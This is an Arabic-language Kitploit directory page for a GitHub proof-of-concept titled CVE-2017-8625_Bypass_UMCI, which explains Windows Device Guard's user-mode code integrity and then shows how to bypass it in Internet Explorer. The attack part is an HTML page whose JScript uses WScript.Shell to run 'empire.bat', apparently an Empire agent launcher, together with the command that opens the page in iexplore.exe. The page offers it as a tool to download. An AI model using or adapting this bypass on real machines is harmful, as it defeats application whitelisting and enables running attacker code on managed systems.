Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-8625_Bypass_UMCI — تجاوز ميزة UMCI في Internet Explorer | Kitploit
أدوات/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
تصعيد الامتيازاتتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

تجاوز ميزة UMCI في Internet Explorer

عرض المستودع
11منذ 8 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ما هو ! Windows Defender Device Guard !


Windows Defender Device Guard هو مزيج من ميزات الأمان المتعلقة بالأجهزة والبرامج على مستوى المؤسسات، والتي عند تهيئتها معًا ستقوم بقفل الجهاز بحيث يمكنه فقط تشغيل التطبيقات الموثوقة التي تحددها في سياسات سلامة الكود الخاصة بك. إذا لم يكن التطبيق موثوقًا، فلن يتمكن من التشغيل، نقطة. مع الأجهزة التي تلبي المتطلبات الأساسية، فهذا يعني أيضًا أنه حتى إذا تمكن المهاجم من السيطرة على نواة Windows، فستكون فرصته في تشغيل كود قابل للتنفيذ ضار أقل بكثير. مع الأجهزة المناسبة، يمكن لـ Windows Defender Device Guard استخدام الميزة الجديدة للأمان القائم على المحاكاة الافتراضية في Windows 10 (المتاحة في إصدارات Enterprise و Education لأجهزة سطح المكتب وفي جميع إصدارات Server) لعزل خدمة سلامة الكود عن نواة Microsoft Windows نفسها. في هذه الحالة، تعمل خدمة سلامة الكود جنبًا إلى جنب مع النواة في حاوية محمية بواسطة برنامج hypervisor الخاص بنظام Windows. يشرح هذا الدليل الميزات الفردية في Windows Defender Device Guard بالإضافة إلى كيفية التخطيط لها، وتكوينها، ونشرها. ويتضمن:

ما هو UMCI

يمنع UMCI تنفيذ الثنائيات غير المعتمدة، ويقيد Windows Scripting Host، ويضع PowerShell في وضع اللغة المقيدة. يجعل هذا الحصول على تنفيذ الكود على النظام أمرًا صعبًا إلى حد ما. هذا المنشور سيستمر

======================================================================||>

تجاوز UMCI في Enternet Explorer بواسطة Jscript !

لنقم بعرض تجاوز الكود

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

تعديل كود Jscript !

لقطة شاشة من 2017-08-25 11-55-12 ======================================================================||>

تشغيل التجاوز التالي

لقطة شاشة من 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

شرح المؤلف

@Matt Homjxi0e

المؤلف للتجاوز

@enigma0x3

تنزيل الأداة